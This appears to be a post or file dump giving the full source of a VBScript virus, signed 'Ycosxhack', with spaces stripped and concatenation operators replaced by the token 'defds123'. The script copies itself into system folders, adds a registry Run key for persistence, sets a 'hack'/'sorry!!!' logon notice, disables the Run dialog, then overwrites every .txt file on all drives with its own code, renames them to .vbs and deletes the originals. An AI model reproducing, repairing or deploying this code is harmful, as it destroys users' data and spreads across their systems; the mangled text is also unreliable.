vbs文件内容
\'Ycosxhack[Y.X.H]
onerrorresumenext
setfso=createobject(\"scripting.filesystemobject\")
randomize
name=int(rnd*100000001)
temp=name
fori=0to2
setdir=fso.getspecialfolder(i)
fso.getfile(wscript.scriptfullname).copy(dirdefds123\"\\\"defds123namedefds123\".vbs\")
next
\'--------------------------------------------------------
setreg=createobject(\"wscript.shell\")
reg.regwrite\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ctfmon\",\"c:\\windows\\system32\\\"defds123tempdefds123\".vbs\"
reg.regwrite\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption\",\"hack\"
reg.regwrite\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText\",\"sorry!!!\"
reg.regwrite\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\",1,\"REG_DWORD\"
\'--------------------------------------------------------
setself=fso.opentextfile(wscript.scriptfullname,1)
cover=self.readall
self.close
setdrvs=fso.drives
foreachdrvindrvs
ifdrv.drivetype=1ordrv.drivetype=2ordrv.drivetype=3ordrv.drivetype=4then
\'wscript.echodrv
scan(drv)
endif
next
setselfkill=fso.getfile(wscript.scriptfullname)
selfkill.delete(true)
\'--------------------------------------------------------
subscan(folder_)
onerrorresumenext
setfolder_=fso.getfolder(folder_)
setfiles=folder_.files
foreachfileinfiles
ext=fso.getextensionname(file)
ext=lcase(ext)
ifext=\"txt\"then
setap=fso.opentextfile(file.path,2,true)
ap.writecover
ap.close
fso.getfile(file.path).copy(file.pathdefds123\".vbs\")
file.delete(true)
endif
next
setsubfolders=folder_.subfolders
foreachsubfolderinsubfolders
scan(subfolder)
next
endsub
|